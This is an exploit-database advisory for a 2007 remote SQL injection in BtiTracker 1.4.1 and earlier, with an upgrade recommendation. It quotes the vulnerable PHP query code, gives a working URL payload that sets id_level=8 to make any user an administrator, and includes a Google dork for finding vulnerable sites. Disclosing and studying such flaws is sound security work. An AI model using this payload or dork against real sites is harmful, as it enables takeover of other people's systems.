BtiTracker - exploit.company

vendor:

BtiTracker

by:

m@ge|ozz - babbano@gmail.com

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: BtiTracker

Affected Version From: 1

Affected Version To: 1.4.2001

Patch Exists: YES

Related CWE:

CPE: a:btiteam:btitracker:1.4.1

Metasploit:

Other Scripts:

Platforms Tested:

2007

BtiTracker <=v1.4.1 Remote SQL Injection Exploit

The BtiTracker version 1.4.1 and below is vulnerable to remote SQL injection. This vulnerability allows any user to become an administrator. The vulnerable code is found in the account_change.php file, where the 'style' and 'language' parameters are not properly sanitized before being used in SQL queries. An attacker can exploit this by manipulating the 'style' parameter in the URL to inject SQL code and gain administrative control. For example, the URL account_change.php?style=2[SQL]&returnto=%2F can be used to execute arbitrary SQL queries. To gain admin control, the URL account_change.php?style=1,id_level=8 can be used.

Mitigation:

The vendor has released an updated version of BtiTracker that addresses this vulnerability. Users are advised to upgrade to the latest version to mitigate this issue.

Source

Exploit-DB raw data:

#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - babbano@gmail.com					
# Vulnerabitity: Remote Sql Injection /	                                        
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################

# milw0rm.com [2007-05-22]